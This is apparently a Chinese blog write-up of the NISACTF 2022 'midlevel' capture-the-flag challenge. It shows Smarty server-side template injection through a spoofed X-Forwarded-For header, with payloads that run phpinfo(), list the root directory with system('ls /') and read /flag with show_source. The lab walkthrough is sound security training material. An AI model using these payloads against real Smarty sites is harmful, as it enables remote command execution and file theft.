[NISACTF 2022]midlevel

妙尽璇机2024-01-05 14:54

[NISACTF 2022]midlevel wp

信息搜集

进入页面,右上角显示了我的真实 IP :

最下面提示:Build With Smarty ! :

Smarty 是 PHP 的模板引擎,判断为 Smarty 模板注入。

Smarty 模板注入

推荐博客:Smarty模板注入&CVE-2017-1000480

抓包,添加 XFF 头为 127.0.0.1,测试回显:

成功回显。

if 语句命令执行

if 语句内可以执行任意 PHP 代码,不要加分号。

复制代码 
{if phpinfo()}{/if}

返回结果:

查看根目录下所有文件:

复制代码 
if system('ls /')}{/if}

返回结果:

发现 flag 。

读取 flag 文件:

复制代码 
{if show_source('/flag')}{/if}

返回结果:

拿到 flag 。

相关推荐
米羊1219 小时前
威胁识别(上)
网络·安全·web安全
白帽子黑客罗哥9 小时前
护网行动中遇到突发安全事件的标准应急响应流程
网络·安全·web安全·计算机·护网行动
世界尽头与你9 小时前
(修复方案)CVE-2023-26111: node-static 路径遍历漏洞
安全·网络安全·渗透测试
ZZ5810 小时前
mumu模拟器adb安装apk以及抓https包
网络安全
hellojackjiang201110 小时前
如何保障分布式IM聊天系统的消息可靠性(即消息不丢)
分布式·网络安全·架构·信息与通信
EverydayJoy^v^11 小时前
RH134简单知识点——第11章—— 管理网络安全
linux·网络·web安全
ZeroNews内网穿透11 小时前
关于飞牛fnOS重要安全更新的提醒
运维·服务器·web安全·ssh
周某人姓周11 小时前
DOM型XSS案例
前端·安全·web安全·网络安全·xss
Yff_world12 小时前
网络安全与 Web 基础笔记
前端·笔记·web安全
白帽子凯哥哥13 小时前
网络安全Web基础完全指南:从小白到入门安全测试
前端·sql·web安全·信息安全·渗透测试·漏洞
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03Claude Code Skills 实用使用手册04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)06OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书07UV安装并设置国内源08在Trae中使用Pencil MCP09Linux下V2Ray安装配置指南102025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望